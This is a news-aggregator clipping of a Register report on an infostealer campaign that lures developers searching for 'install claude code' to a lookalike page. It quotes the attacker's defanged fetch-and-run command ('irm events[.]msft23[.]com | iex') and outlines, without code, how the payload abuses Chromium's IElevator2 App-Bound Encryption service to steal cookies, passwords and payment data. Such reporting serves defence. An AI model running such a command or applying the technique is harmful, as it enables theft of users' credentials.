"The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is "irm https[:]//claude[.]ai/install.ps1 | iex", and the lure replaced the destination host with "irm events[.]msft23[.]com | iex"."
"The payload is unique, and doesn't match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera."
"The attacks also abuses the IElevator2 COM interface. This is Chromium's elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords."
"It relies on developers searching for "install claude code," and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic's authentic installer - but as Ontinue's team found, the"
A campaign targets developers by using fake “one-line installer” lures that execute attacker-controlled commands. The lure imitates a legitimate Claude Code installer while redirecting to attacker infrastructure. The delivered payload is not tied to a known malware family and focuses on Chromium-based browsers. It exfiltrates decrypted cookies, passwords, and payment methods by abusing IElevator2, a Chromium elevation service used for App-Bound Encryption. Earlier cookie-stealing methods relied on copying SQLite databases, but the new approach leverages IElevator2 to bypass protections. The attack infrastructure uses multiple newly registered domains routed through Cloudflare and depends on developers searching for “install claude code” and clicking sponsored lookalike pages that download and run the authentic installer before malicious activity occurs.
#developer-targeted-infostealers #chromium-browser-data-theft #ielevator2-and-app-bound-encryption #malicious-installer-phishing #cloudflare-hosted-infrastructure
Read at theregister
Unable to calculate read time
Collection
[
|
...
]